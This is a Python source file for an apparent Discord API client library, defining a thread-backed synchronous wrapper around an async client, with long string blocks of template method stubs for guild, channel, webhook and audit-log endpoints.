guild_modify_afk_channel_id(self, guild_id: str, new_afk_channel_id: str) -> dict: return await super().guild_modify_afk_channel_id(guild_id, new_afk_channel_id) async def guild_modify_afk_timeout(self, guild_id: str, new_afk_timeout: int) -> dict: return await super().guild_modify_afk_timeout(guild_id, new_afk_timeout) async def guild_modify_icon(self, guild_id: str, new_icon: str) -> dict: return await super().guild_modify_icon(guild_id, new_icon) async def guild_modify_owner_id(self, guild_id: str, new_owner_id: str) -> dict: return await super().guild_modify_owner_id(guild_id, new_owner_id) async def guild_modify_splash(self, guild_id: str, new_splash: str) -> dict: return await super().guild_modify_splash(guild_id, new_splash) async def guild_modify_system_channel_id(self, guild_id: str, new_system_channel_id: str) -> dict: return await super().guild_modify_system_channel_id(guild_id, new_system_channel_id) async def guild_delete(self, guild_id: str) -> bool: return await super().guild_delete(guild_id) async def guild_channel_list(self, guild_id: str) -> dict: return await super().guild_channel_list(guild_id) async def guild_channel_create_text(self, guild_id: str, name: str, permission_overwrites: dict = None, parent_id: str = None, nsfw: bool = None) -> dict: return await super().guild_channel_create_text(guild_id, name, permission_overwrites, parent_id, nsfw) async def guild_channel_create_voice(self, guild_id: str, name: str, permission_overwrites: dict = None, parent_id: str = None, nsfw: bool = None, bitrate: int = None, user_limit: int = None) -> dict: return await super().guild_channel_create_voice(guild_id, name, permission_overwrites, parent_id, nsfw, bitrate, user_limit) async def guild_channel_create_category(self, guild_id: str, name: str, permission_overwrites: dict = None, nsfw: bool = None) -> dict: return await super().guild_channel_create_category(guild_id, name, permission_overwrites, nsfw) async def guild_channels_position_modify(self, guild_id: str, list_of_channels: list) -> bool: return await super().guild_channels_position_modify(guild_id, list_of_channels) async def guild_member_get(self, guild_id: str, user_id: str) -> dict: return await super().guild_member_get(guild_id, user_id) async def guild_members_list(self, guild_id: str, limit: int = None, after: str = None) -> typing.List[dict]: return await super().guild_members_list(guild_id, limit, after) async def guild_member_iter(self, guild_id: str, step_size: int = 1000) -> typing.Generator[dict, None, None]: return await super().guild_member_iter(guild_id, step_size) async def guild_member_add(self, guild_id: str, user_id: str, access_token: str, nick: str = None, roles: list = None, mute: bool = None, deaf: bool = None) -> dict: return await super().guild_member_add(guild_id, user_id, access_token, nick, roles, mute, deaf) async def guild_member_modify_nick(self, guild_id: str, user_id: str, nick_to_set: str) -> bool: return await super().guild_member_modify_nick(guild_id, user_id, nick_to_set) async def guild_member_modify_roles(self, guild_id: str, user_id: str, roles: list) -> bool: return await super().guild_member_modify_roles(guild_id, user_id, roles) async def guild_member_modify_mute(self, guild_id: str, user_id: str, mute_bool: bool) -> bool: return await super().guild_member_modify_mute(guild_id, user_id, mute_bool) async def guild_member_modify_deaf(self, guild_id: str, user_id: str, deaf_bool: bool) -> bool: return await super().guild_member_modify_deaf(guild_id, user_id, deaf_bool) async def guild_member_modify_move(self, guild_id: str, user_id: str, channel_move_to: int) -> bool: return await super().guild_member_modify_move(guild_id, user_id, channel_move_to) async def guild_member_me_nick_set(self, guild_id: str, nick_to_set: str) -> dict: return await super().guild_member_me_nick_set(guild_id, nick_to_set) async def guild_member_role_add(self, guild_id: str, user_id: str, role_id: str) -> bool: return await super().guild_member_role_add(guild_id, user_id, role_id) async def guild_member_role_remove(self, guild_id: str, user_id: str, role_id: str) -> bool: return await super().guild_member_role_remove(guild_id, user_id, role_id) async def guild_member_remove(self, guild_id: str, user_id: str) -> bool: return await super().guild_member_remove(guild_id, user_id) async def guild_ban_list(self, guild_id: str) -> dict: return await super().guild_ban_list(guild_id) async def guild_ban_create(self, guild_id: str, user_id: str, delete_messages_days=None) -> bool: return await super().guild_ban_create(guild_id, user_id, delete_messages_days) async def guild_ban_remove(self, guild_id: str, user_id: str) -> bool: return await super().guild_ban_remove(guild_id, user_id) async def guild_role_list(self, guild_id: str) -> dict: return await super().guild_role_list(guild_id) async def guild_role_create(self, guild_id: str, permissions: int = None, color: int = None, hoist: bool = None, mentionable: bool = None) -> dict: return await super().guild_role_create(guild_id, permissions, color, hoist, mentionable) async def guild_role_position_modify(self, guild_id: str, list_of_role_positions: list) -> dict: return await super().guild_role_position_modify(guild_id, list_of_role_positions) async def _guild_role_modify(self, guild_id: str, role_id: str, params: dict) -> dict: return await super()._guild_role_modify(guild_id, role_id, params) async def guild_role_modify_name(self, guild_id: str, role_id: str, name: str) -> dict: return await super().guild_role_modify_name(guild_id, role_id, name) async def guild_role_modify_permissions(self, guild_id: str, role_id: str, permissions: int) -> dict: return await super().guild_role_modify_permissions(guild_id, role_id, permissions) async def guild_role_modify_color(self, guild_id: str, role_id: str, color: int) -> dict: return await super().guild_role_modify_color(guild_id, role_id, color) async def guild_role_modify_hoist(self, guild_id: str, role_id: str, hoist: bool) -> dict: return await super().guild_role_modify_hoist(guild_id, role_id, hoist) async def guild_role_modify_mentionable(self, guild_id: str, role_id: str, mentionable: bool) -> dict: return await super().guild_role_modify_mentionable(guild_id, role_id, mentionable) async def guild_role_delete(self, guild_id: str, role_id: str) -> dict: return await super().guild_role_delete(guild_id, role_id) async def guild_prune_get_count(self, guild_id: str, days: int) -> dict: return await super().guild_prune_get_count(guild_id, days) async def guild_prune_begin(self, guild_id: str, days: int) -> dict: return await super().guild_prune_begin(guild_id, days) async def guild_voice_region_list(self, guild_id: str) -> dict: return await super().guild_voice_region_list(guild_id) async def guild_invite_list(self, guild_id: str) -> dict: return await super().guild_invite_list(guild_id) async def guild_integration_list(self, guild_id: str) -> dict: return await super().guild_integration_list(guild_id) async def guild_integration_create(self, guild_id: str, integration_type: str, integration_id: str) -> dict: return await super().guild_integration_create(guild_id, integration_type, integration_id) async def guild_integration_modify(self, guild_id: str, integration_id: str, expire_behavior: int, expire_grace_period: int, enable_emoticons: int) -> dict: return await super().guild_integration_modify(guild_id, integration_id, expire_behavior, expire_grace_period, enable_emoticons) async def guild_integration_delete(self, guild_id: str, integration_id: str) -> dict: return await super().guild_integration_delete(guild_id, integration_id) async def guild_integration_sync(self, guild_id: str, integration_id: str) -> dict: return await super().guild_integration_sync(guild_id, integration_id) async def guild_embed_get(self, guild_id: str) -> dict: return await super().guild_embed_get(guild_id) async def guild_embed_modify(self, guild_id: str, enabled: bool = None, channel_id: str = None) -> dict: return await super().guild_embed_modify(guild_id, enabled, channel_id) async def guild_emoji_list(self, guild_id: str) -> dict: return await super().guild_emoji_list(guild_id) async def guild_emoji_get(self, guild_id: str, emoji_id: str) -> dict: return await super().guild_emoji_get(guild_id, emoji_id) async def guild_emoji_create(self, guild_id: str, emoji_name: str, image: str, roles: tuple = ()) -> dict: return await super().guild_emoji_create(guild_id, emoji_name, image, roles) async def guild_emoji_modify(self, guild_id: str, emoji_id: str, emoji_name: str, roles: tuple = ()) -> dict: return await super().guild_emoji_modify(guild_id, emoji_id, emoji_name, roles) async def guild_emoji_delete(self, guild_id: str, emoji_id: str) -> dict: return await super().guild_emoji_delete(guild_id, emoji_id) async def channel_get(self, channel_id: str) -> dict: return await super().channel_get(channel_id) async def channel_modify_name(self, channel_id: str, name: str) -> dict: return await super().channel_modify_name(channel_id, name) async def channel_modify_position(self, channel_id: str, position: int) -> dict: return await super().channel_modify_position(channel_id, position) async def channel_modify_topic(self, channel_id: str, topic: str) -> dict: return await super().channel_modify_topic(channel_id, topic) async def channel_modify_bitrate(self, channel_id: str, bitrate: int) -> dict: return await super().channel_modify_bitrate(channel_id, bitrate) async def channel_modify_user_limit(self, channel_id: str, userlimit: int) -> dict: return await super().channel_modify_user_limit(channel_id, userlimit) async def channel_modify_permission_overwrites(self, channel_id: str, overwrite_array: list) -> dict: return await super().channel_modify_permission_overwrites(channel_id, overwrite_array) async def channel_modify_parent_id(self, channel_id: str, parent_id: str): return await super().channel_modify_parent_id(channel_id, parent_id) async def channel_delete(self, channel_id: str) -> dict: return await super().channel_delete(channel_id) async def channel_message_list(self, channel_id: str, limit: int = None, around: int = None, before: str = None, after: str = None) -> typing.List[dict]: return await super().channel_message_list(channel_id, limit, around, before, after) async def channel_message_iter(self, channel_id: str, step_size: int = 100) -> typing.AsyncGenerator[dict, None]: return await super().channel_message_iter(channel_id, step_size) async def channel_message_get(self, channel_id: str, message_id: str) -> dict: return await super().channel_message_get(channel_id, message_id) async def channel_message_create(self, channel_id: str, content: str, nonce: bool = None, tts: bool = None, embed: dict = None, files_tuples: typing.Tuple[str, bytes] = None) -> dict: return await super().channel_message_create(channel_id, content, nonce, tts, embed, files_tuples) async def channel_message_reaction_create(self, channel_id: str, message_id: str, emoji: str) -> bool: return await super().channel_message_reaction_create(channel_id, message_id, emoji) async def channel_message_reaction_my_delete(self, channel_id: str, message_id: str, emoji: int) -> bool: return await super().channel_message_reaction_my_delete(channel_id, message_id, emoji) async def channel_message_reaction_delete(self, channel_id: str, message_id: str, user_id: str, emoji: int) -> bool: return await super().channel_message_reaction_delete(channel_id, message_id, user_id, emoji) async def channel_message_reaction_list_users(self, channel_id: str, message_id: str, emoji: str, before: str = None, after: str = None, limit: int = None) -> \ typing.List[dict]: return await super().channel_message_reaction_list_users(channel_id, message_id, emoji, before, after, limit) async def channel_message_reaction_iter_users(self, channel_id: str, message_id: str, emoji: str, step_size: int = 100) -> typing.AsyncGenerator[dict, None]: return await super().channel_message_reaction_iter_users(channel_id, message_id, emoji, step_size) async def channel_message_reaction_delete_all(self, channel_id: str, message_id: str) -> bool: return await super().channel_message_reaction_delete_all(channel_id, message_id) async def channel_message_edit(self, channel_id: str, message_id: str, content: str = None, embed: dict = None) -> dict: return await super().channel_message_edit(channel_id, message_id, content, embed) async def channel_message_delete(self, channel_id: str, message_id: str) -> bool: return await super().channel_message_delete(channel_id, message_id) async def channel_message_bulk_delete(self, channel_id: str, messages_array: list) -> bool: return await super().channel_message_bulk_delete(channel_id, messages_array) async def channel_permissions_overwrite_edit(self, channel_id: str, overwrite_id: str, allow_permissions: int, deny_permissions: int, type_of_permissions: str) -> bool: return await super().channel_permissions_overwrite_edit(channel_id, overwrite_id, allow_permissions, deny_permissions, type_of_permissions) async def channel_permissions_overwrite_delete(self, channel_id: str, overwrite_id: str) -> bool: return await super().channel_permissions_overwrite_delete(channel_id, overwrite_id) async def channel_invite_list(self, channel_id: str) -> dict: return await super().channel_invite_list(channel_id) async def channel_invite_create(self, channel_id: str, max_age: int = None, max_uses: int = None, temporary_invite: bool = None, unique: bool = None) -> dict: return await super().channel_invite_create(channel_id, max_age, max_uses, temporary_invite, unique) async def channel_typing_start(self, channel_id: str) -> bool: return await super().channel_typing_start(channel_id) async def channel_pins_get(self, channel_id: str) -> dict: return await super().channel_pins_get(channel_id) async def channel_pins_add(self, channel_id: str, message_id: str) -> dict: return await super().channel_pins_add(channel_id, message_id) async def channel_pins_delete(self, channel_id: str, message_id: str) -> bool: return await super().channel_pins_delete(channel_id, message_id) async def invite_get(self, invite_code: str) -> dict: return await super().invite_get(invite_code) async def invite_delete(self, invite_code: str) -> dict: return await super().invite_delete(invite_code) async def invite_accept(self, invite_code: str) -> dict: return await super().invite_accept(invite_code) async def webhook_create(self, channel_id: str, name: str, avatar: bytes = None) -> dict: return await super().webhook_create(channel_id, name, avatar) async def webhook_get_channel(self, channel_id: str) -> dict: return await super().webhook_get_channel(channel_id) async def webhook_guild_get(self, guild_id: str) -> dict: return await super().webhook_guild_get(guild_id) async def webhook_get(self, webhook_id: str) -> dict: return await super().webhook_get(webhook_id) async def webhook_token_get(self, webhook_id: str, webhook_token: int) -> dict: return await super().webhook_token_get(webhook_id, webhook_token) async def webhook_modify(self, webhook_id: str, name: str = None, avatar: bytes = None, channel_id: str = None) -> dict: return await super().webhook_modify(webhook_id, name, avatar, channel_id) async def webhook_token_modify(self, webhook_id: str, webhook_token: int, name: str = None, avatar: bytes = None, channel_id: str = None) -> dict: return await super().webhook_token_modify(webhook_id, webhook_token, name, avatar, channel_id) async def webhook_delete(self, webhook_id: str) -> dict: return await super().webhook_delete(webhook_id) async def webhook_token_delete(self, webhook_id: str, webhook_token: int) -> dict: return await super().webhook_token_delete(webhook_id, webhook_token) async def webhook_execute(self, webhook_id: str, webhook_token: int, content: str, username: str = None, avatar_url: str = None, tts: bool = None, wait_response: bool = None) -> dict: return await super().webhook_execute(webhook_id, webhook_token, content, username, avatar_url, tts, wait_response) async def voice_region_list(self) -> dict: return await super().voice_region_list() async def audit_log_get(self, guild_id: str, filter_user_id: str = None, filter_action_type: int = None, before: str = None, limit: int = None) -> typing.Tuple[dict, dict, dict]: return await super().audit_log_get(guild_id, filter_user_id, filter_action_type, before, limit) async def audit_log_iter(self, guild_id: str, filter_user_id: str = None, filter_action_type: int = None, step_size: int = 100) -> typing.AsyncGenerator[typing.Tuple[dict, dict, dict], None]: return await super().audit_log_iter(guild_id, filter_user_id, filter_action_type, step_size) async def gateway_bot_get(self) -> dict: return await super().gateway_bot_get() '''
import typing from .client_async import DiscordClientAsync import asyncio import threading class DiscordClientSync: def __init__(self, token: str, use_socket: bool = True, proxies: dict = None, default_timeout: int = 10): """ wrapper template return asyncio.run_coroutine_threadsafe( self.async_client. , self.client_event_loop ).result(timeout=self.timeout) :param token: :param use_socket: :param proxies: :param default_timeout: """ self.client_event_loop: asyncio.AbstractEventLoop = asyncio.new_event_loop() self.client_thread = threading.Thread(target=self.client_event_loop.run_forever) self.client_thread.start() self.async_client = DiscordClientAsync(token, use_socket, proxies, self.client_event_loop) self.local_event_loop = asyncio.get_event_loop() self.timeout = default_timeout def user_get(self, user_id: str) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.user_get(user_id), self.client_event_loop ).result(timeout=self.timeout) def me_get(self) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.me_get(), self.client_event_loop ).result(timeout=self.timeout) def me_modify(self, username: str) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.me_modify(username), self.client_event_loop ).result(timeout=self.timeout) def me_guild_list(self, before: str = None, after: str = None, limit: int = None) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.me_guild_list(before, after, limit), self.client_event_loop ).result(timeout=self.timeout) def me_guild_leave(self, guild_id: str) -> bool: return asyncio.run_coroutine_threadsafe( self.async_client.me_guild_leave(guild_id), self.client_event_loop ).result(timeout=self.timeout) def me_connections_get(self) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.me_connections_get(), self.client_event_loop ).result(timeout=self.timeout) def me_dm_list(self) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.me_dm_list(), self.client_event_loop ).result(timeout=self.timeout) ''' async def dm_create(self, recipient_id: str) -> dict: return await super().dm_create(recipient_id) async def dm_create_group(self, access_tokens: list, nicks: dict) -> dict: return await super().dm_create_group(access_tokens, nicks) async def dm_channel_user_add(self, channel_id: str, user_id: str, access_token: str, user_nick: str) -> dict: return await super().dm_channel_user_add(channel_id, user_id, access_token, user_nick) async def dm_channel_user_remove(self, channel_id: str, user_id: str) -> dict: return await super().dm_channel_user_remove(channel_id, user_id) async def guild_create(self, guild_name: str, region: str = None, icon: str = None, verification_level: int = None, default_message_notifications: int = None, roles=None, channels=None) -> dict: return await super().guild_create(guild_name, region, icon, verification_level, default_message_notifications, roles, channels) async def guild_get(self, guild_id: str) -> dict: return await super().guild_get(guild_id) async def guild_modify_name(self, guild_id: str, new_name: str) -> dict: return await super().guild_modify_name(guild_id, new_name) async def guild_modify_region(self, guild_id: str, new_region: str) -> dict: return await super().guild_modify_region(guild_id, new_region) async def guild_modify_verification_level(self, guild_id: str, new_level: int) -> dict: return await super().guild_modify_verification_level(guild_id, new_level) async def guild_modify_default_notification_level(self, guild_id: str, new_level: int) -> bool: return await super().guild_modify_default_notification_level(guild_id, new_level) async def guild_modify_afk_channel_id(self, guild_id: str, new_afk_channel_id: str) -> dict: return await super().guild_modify_afk_channel_id(guild_id, new_afk_channel_id) async def guild_modify_afk_timeout(self, guild_id: str, new_afk_timeout: int) -> dict: return await super().guild_modify_afk_timeout(guild_id, new_afk_timeout) async def guild_modify_icon(self, guild_id: str, new_icon: str) -> dict: return await super().guild_modify_icon(guild_id, new_icon) async def guild_modify_owner_id(self, guild_id: str, new_owner_id: str) -> dict: return await super().guild_modify_owner_id(guild_id, new_owner_id) async def guild_modify_splash(self, guild_id: str, new_splash: str) -> dict: return await super().guild_modify_splash(guild_id, new_splash) async def guild_modify_system_channel_id(self, guild_id: str, new_system_channel_id: str) -> dict: return await super().guild_modify_system_channel_id(guild_id, new_system_channel_id) async def guild_delete(self, guild_id: str) -> bool: return await super().guild_delete(guild_id) async def guild_channel_list(self, guild_id: str) -> dict: return await super().guild_channel_list(guild_id) async def guild_channel_create_text(self, guild_id: str, name: str, permission_overwrites: dict = None, parent_id: str = None, nsfw: bool = None) -> dict: return await super().guild_channel_create_text(guild_id, name, permission_overwrites, parent_id, nsfw) async def guild_channel_create_voice(self, guild_id: str, name: str, permission_overwrites: dict = None, parent_id: str = None, nsfw: bool = None, bitrate: int = None, user_limit: int = None) -> dict: return await super().guild_channel_create_voice(guild_id, name, permission_overwrites, parent_id, nsfw, bitrate, user_limit) async def guild_channel_create_category(self, guild_id: str, name: str, permission_overwrites: dict = None, nsfw: bool = None) -> dict: return await super().guild_channel_create_category(guild_id, name, permission_overwrites, nsfw) async def guild_channels_position_modify(self, guild_id: str, list_of_channels: list) -> bool: return await super().guild_channels_position_modify(guild_id, list_of_channels) async def guild_member_get(self, guild_id: str, user_id: str) -> dict: return await super().guild_member_get(guild_id, user_id) async def guild_members_list(self, guild_id: str, limit: int = None, after: str = None) -> typing.List[dict]: return await super().guild_members_list(guild_id, limit, after) async def guild_member_iter(self, guild_id: str, step_size: int = 1000) -> typing.Generator[dict, None, None]: return await super().guild_member_iter(guild_id, step_size) async def guild_member_add(self, guild_id: str, user_id: str, access_token: str, nick: str = None, roles: list = None, mute: bool = None, deaf: bool = None) -> dict: return await super().guild_member_add(guild_id, user_id, access_token, nick, roles, mute, deaf) async def guild_member_modify_nick(self, guild_id: str, user_id: str, nick_to_set: str) -> bool: return await super().guild_member_modify_nick(guild_id, user_id, nick_to_set) async def guild_member_modify_roles(self, guild_id: str, user_id: str, roles: list) -> bool: return await super().guild_member_modify_roles(guild_id, user_id, roles) async def guild_member_modify_mute(self, guild_id: str, user_id: str, mute_bool: bool) -> bool: return await super().guild_member_modify_mute(guild_id, user_id, mute_bool) async def guild_member_modify_deaf(self, guild_id: str, user_id: str, deaf_bool: bool) -> bool: return await super().guild_member_modify_deaf(guild_id, user_id, deaf_bool) async def guild_member_modify_move(self, guild_id: str, user_id: str, channel_move_to: int) -> bool: return await super().guild_member_modify_move(guild_id, user_id, channel_move_to) async def guild_member_me_nick_set(self, guild_id: str, nick_to_set: str) -> dict: return await super().guild_member_me_nick_set(guild_id, nick_to_set) async def guild_member_role_add(self, guild_id: str, user_id: str, role_id: str) -> bool: return await super().guild_member_role_add(guild_id, user_id, role_id) async def guild_member_role_remove(self, guild_id: str, user_id: str, role_id: str) -> bool: return await super().guild_member_role_remove(guild_id, user_id, role_id) async def guild_member_remove(self, guild_id: str, user_id: str) -> bool: return await super().guild_member_remove(guild_id, user_id) async def guild_ban_list(self, guild_id: str) -> dict: return await super().guild_ban_list(guild_id) async def guild_ban_create(self, guild_id: str, user_id: str, delete_messages_days=None) -> bool: return await super().guild_ban_create(guild_id, user_id, delete_messages_days) async def guild_ban_remove(self, guild_id: str, user_id: str) -> bool: return await super().guild_ban_remove(guild_id, user_id) async def guild_role_list(self, guild_id: str) -> dict: return await super().guild_role_list(guild_id) async def guild_role_create(self, guild_id: str, permissions: int = None, color: int = None, hoist: bool = None, mentionable: bool = None) -> dict: return await super().guild_role_create(guild_id, permissions, color, hoist, mentionable) async def guild_role_position_modify(self, guild_id: str, list_of_role_positions: list) -> dict: return await super().guild_role_position_modify(guild_id, list_of_role_positions) async def _guild_role_modify(self, guild_id: str, role_id: str, params: dict) -> dict: return await super()._guild_role_modify(guild_id, role_id, params) async def guild_role_modify_name(self, guild_id: str, role_id: str, name: str) -> dict: return await super().guild_role_modify_name(guild_id, role_id, name) async def guild_role_modify_permissions(self, guild_id: str, role_id: str, permissions: int) -> dict: return await super().guild_role_modify_permissions(guild_id, role_id, permissions) async def guild_role_modify_color(self, guild_id: str, role_id: str, color: int) -> dict: return await super().guild_role_modify_color(guild_id, role_id, color) async def guild_role_modify_hoist(self, guild_id: str, role_id: str, hoist: bool) -> dict: return await super().guild_role_modify_hoist(guild_id, role_id, hoist) async def guild_role_modify_mentionable(self, guild_id: str, role_id: str, mentionable: bool) -> dict: return await super().guild_role_modify_mentionable(guild_id, role_id, mentionable) async def guild_role_delete(self, guild_id: str, role_id: str) -> dict: return await super().guild_role_delete(guild_id, role_id) async def guild_prune_get_count(self, guild_id: str, days: int) -> dict: return await super().guild_prune_get_count(guild_id, days) async def guild_prune_begin(self, guild_id: str, days: int) -> dict: return await super().guild_prune_begin(guild_id, days) async def guild_voice_region_list(self, guild_id: str) -> dict: return await super().guild_voice_region_list(guild_id) async def guild_invite_list(self, guild_id: str) -> dict: return await super().guild_invite_list(guild_id) async def guild_integration_list(self, guild_id: str) -> dict: return await super().guild_integration_list(guild_id) async def guild_integration_create(self, guild_id: str, integration_type: str, integration_id: str) -> dict: return await super().guild_integration_create(guild_id, integration_type, integration_id) async def guild_integration_modify(self, guild_id: str, integration_id: str, expire_behavior: int, expire_grace_period: int, enable_emoticons: int) -> dict: return await super().guild_integration_modify(guild_id, integration_id, expire_behavior, expire_grace_period, enable_emoticons) async def guild_integration_delete(self, guild_id: str, integration_id: str) -> dict: return await super().guild_integration_delete(guild_id, integration_id) async def guild_integration_sync(self, guild_id: str, integration_id: str) -> dict: return await super().guild_integration_sync(guild_id, integration_id) async def guild_embed_get(self, guild_id: str) -> dict: return await super().guild_embed_get(guild_id) async def guild_embed_modify(self, guild_id: str, enabled: bool = None, channel_id: str = None) -> dict: return await super().guild_embed_modify(guild_id, enabled, channel_id) async def guild_emoji_list(self, guild_id: str) -> dict: return await super().guild_emoji_list(guild_id) async def guild_emoji_get(self, guild_id: str, emoji_id: str) -> dict: return await super().guild_emoji_get(guild_id, emoji_id) async def guild_emoji_create(self, guild_id: str, emoji_name: str, image: str, roles: tuple = ()) -> dict: return await super().guild_emoji_create(guild_id, emoji_name, image, roles) async def guild_emoji_modify(self, guild_id: str, emoji_id: str, emoji_name: str, roles: tuple = ()) -> dict: return await super().guild_emoji_modify(guild_id, emoji_id, emoji_name, roles) async def guild_emoji_delete(self, guild_id: str, emoji_id: str) -> dict: return await super().guild_emoji_delete(guild_id, emoji_id) async def channel_get(self, channel_id: str) -> dict: return await super().channel_get(channel_id) async def channel_modify_name(self, channel_id: str, name: str) -> dict: return await super().channel_modify_name(channel_id, name) async def channel_modify_position(self, channel_id: str, position: int) -> dict: return await super().channel_modify_position(channel_id, position) async def channel_modify_topic(self, channel_id: str, topic: str) -> dict: return await super().channel_modify_topic(channel_id, topic) async def channel_modify_bitrate(self, channel_id: str, bitrate: int) -> dict: return await super().channel_modify_bitrate(channel_id, bitrate) async def channel_modify_user_limit(self, channel_id: str, userlimit: int) -> dict: return await super().channel_modify_user_limit(channel_id, userlimit) async def channel_modify_permission_overwrites(self, channel_id: str, overwrite_array: list) -> dict: return await super().channel_modify_permission_overwrites(channel_id, overwrite_array) async def channel_modify_parent_id(self, channel_id: str, parent_id: str): return await super().channel_modify_parent_id(channel_id, parent_id) async def channel_delete(self, channel_id: str) -> dict: return await super().channel_delete(channel_id) async def channel_message_list(self, channel_id: str, limit: int = None, around: int = None, before: str = None, after: str = None) -> typing.List[dict]: return await super().channel_message_list(channel_id, limit, around, before, after) async def channel_message_iter(self, channel_id: str, step_size: int = 100) -> typing.AsyncGenerator[dict, None]: return await super().channel_message_iter(channel_id, step_size) async def channel_message_get(self, channel_id: str, message_id: str) -> dict: return await super().channel_message_get(channel_id, message_id) async def channel_message_create(self, channel_id: str, content: str, nonce: bool = None, tts: bool = None, embed: dict = None, files_tuples: typing.Tuple[str, bytes] = None) -> dict: return await super().channel_message_create(channel_id, content, nonce, tts, embed, files_tuples) async def channel_message_reaction_create(self, channel_id: str, message_id: str, emoji: str) -> bool: return await super().channel_message_reaction_create(channel_id, message_id, emoji) async def channel_message_reaction_my_delete(self, channel_id: str, message_id: str, emoji: int) -> bool: return await super().channel_message_reaction_my_delete(channel_id, message_id, emoji) async def channel_message_reaction_delete(self, channel_id: str, message_id: str, user_id: str, emoji: int) -> bool: return await super().channel_message_reaction_delete(channel_id, message_id, user_id, emoji) async def channel_message_reaction_list_users(self, channel_id: str, message_id: str, emoji: str, before: str = None, after: str = None, limit: int = None) -> \ typing.List[dict]: return await super().channel_message_reaction_list_users(channel_id, message_id, emoji, before, after, limit) async def channel_message_reaction_iter_users(self, channel_id: str, message_id: str, emoji: str, step_size: int = 100) -> typing.AsyncGenerator[dict, None]: return await super().channel_message_reaction_iter_users(channel_id, message_id, emoji, step_size) async def channel_message_reaction_delete_all(self, channel_id: str, message_id: str) -> bool: return await super().channel_message_reaction_delete_all(channel_id, message_id) async def channel_message_edit(self, channel_id: str, message_id: str, content: str = None, embed: dict = None) -> dict: return await super().channel_message_edit(channel_id, message_id, content, embed) async def channel_message_delete(self, channel_id: str, message_id: str) -> bool: return await super().channel_message_delete(channel_id, message_id) async def channel_message_bulk_delete(self, channel_id: str, messages_array: list) -> bool: return await super().channel_message_bulk_delete(channel_id, messages_array) async def channel_permissions_overwrite_edit(self, channel_id: str, overwrite_id: str, allow_permissions: int, deny_permissions: int, type_of_permissions: str) -> bool: return await super().channel_permissions_overwrite_edit(channel_id, overwrite_id, allow_permissions, deny_permissions, type_of_permissions) async def channel_permissions_overwrite_delete(self, channel_id: str, overwrite_id: str) -> bool: return await super().channel_permissions_overwrite_delete(channel_id, overwrite_id) async def channel_invite_list(self, channel_id: str) -> dict: return await super().channel_invite_list(channel_id) async def channel_invite_create(self, channel_id: str, max_age: int = None, max_uses: int = None, temporary_invite: bool = None, unique: bool = None) -> dict: return await super().channel_invite_create(channel_id, max_age, max_uses, temporary_invite, unique) async def channel_typing_start(self, channel_id: str) -> bool: return await super().channel_typing_start(channel_id) async def channel_pins_get(self, channel_id: str) -> dict: return await super().channel_pins_get(channel_id) async def channel_pins_add(self, channel_id: str, message_id: str) -> dict: return await super().channel_pins_add(channel_id, message_id) async def channel_pins_delete(self, channel_id: str, message_id: str) -> bool: return await super().channel_pins_delete(channel_id, message_id) async def invite_get(self, invite_code: str) -> dict: return await super().invite_get(invite_code) async def invite_delete(self, invite_code: str) -> dict: return await super().invite_delete(invite_code) async def invite_accept(self, invite_code: str) -> dict: return await super().invite_accept(invite_code) async def webhook_create(self, channel_id: str, name: str, avatar: bytes = None) -> dict: return await super().webhook_create(channel_id, name, avatar) async def webhook_get_channel(self, channel_id: str) -> dict: return await super().webhook_get_channel(channel_id) async def webhook_guild_get(self, guild_id: str) -> dict: return await super().webhook_guild_get(guild_id) async def webhook_get(self, webhook_id: str) -> dict: return await super().webhook_get(webhook_id) async def webhook_token_get(self, webhook_id: str, webhook_token: int) -> dict: return await super().webhook_token_get(webhook_id, webhook_token) async def webhook_modify(self, webhook_id: str, name: str = None, avatar: bytes = None, channel_id: str = None) -> dict: return await super().webhook_modify(webhook_id, name, avatar, channel_id) async def webhook_token_modify(self, webhook_id: str, webhook_token: int, name: str = None, avatar: bytes = None, channel_id: str = None) -> dict: return await super().webhook_token_modify(webhook_id, webhook_token, name, avatar, channel_id) async def webhook_delete(self, webhook_id: str) -> dict: return await super().webhook_delete(webhook_id) async def webhook_token_delete(self, webhook_id: str, webhook_token: int) -> dict: return await super().webhook_token_delete(webhook_id, webhook_token) async def webhook_execute(self, webhook_id: str, webhook_token: int, content: str, username: str = None, avatar_url: str = None, tts: bool = None, wait_response: bool = None) -> dict: return await super().webhook_execute(webhook_id, webhook_token, content, username, avatar_url, tts, wait_response) async def voice_region_list(self) -> dict: return await super().voice_region_list() async def audit_log_get(self, guild_id: str, filter_user_id: str = None, filter_action_type: int = None, before: str = None, limit: int = None) -> typing.Tuple[dict, dict, dict]: return await super().audit_log_get(guild_id, filter_user_id, filter_action_type, before, limit) async def audit_log_iter(self, guild_id: str, filter_user_id: str = None, filter_action_type: int = None, step_size: int = 100) -> typing.AsyncGenerator[typing.Tuple[dict, dict, dict], None]: return await super().audit_log_iter(guild_id, filter_user_id, filter_action_type, step_size) async def gateway_bot_get(self) -> dict: return await super().gateway_bot_get() '''
en
0.387857
wrapper template return asyncio.run_coroutine_threadsafe( self.async_client. , self.client_event_loop ).result(timeout=self.timeout) :param token: :param use_socket: :param proxies: :param default_timeout: async def dm_create(self, recipient_id: str) -> dict: return await super().dm_create(recipient_id) async def dm_create_group(self, access_tokens: list, nicks: dict) -> dict: return await super().dm_create_group(access_tokens, nicks) async def dm_channel_user_add(self, channel_id: str, user_id: str, access_token: str, user_nick: str) -> dict: return await super().dm_channel_user_add(channel_id, user_id, access_token, user_nick) async def dm_channel_user_remove(self, channel_id: str, user_id: str) -> dict: return await super().dm_channel_user_remove(channel_id, user_id) async def guild_create(self, guild_name: str, region: str = None, icon: str = None, verification_level: int = None, default_message_notifications: int = None, roles=None, channels=None) -> dict: return await super().guild_create(guild_name, region, icon, verification_level, default_message_notifications, roles, channels) async def guild_get(self, guild_id: str) -> dict: return await super().guild_get(guild_id) async def guild_modify_name(self, guild_id: str, new_name: str) -> dict: return await super().guild_modify_name(guild_id, new_name) async def guild_modify_region(self, guild_id: str, new_region: str) -> dict: return await super().guild_modify_region(guild_id, new_region) async def guild_modify_verification_level(self, guild_id: str, new_level: int) -> dict: return await super().guild_modify_verification_level(guild_id, new_level) async def guild_modify_default_notification_level(self, guild_id: str, new_level: int) -> bool: return await super().guild_modify_default_notification_level(guild_id, new_level) async def guild_modify_afk_channel_id(self, guild_id: str, new_afk_channel_id: str) 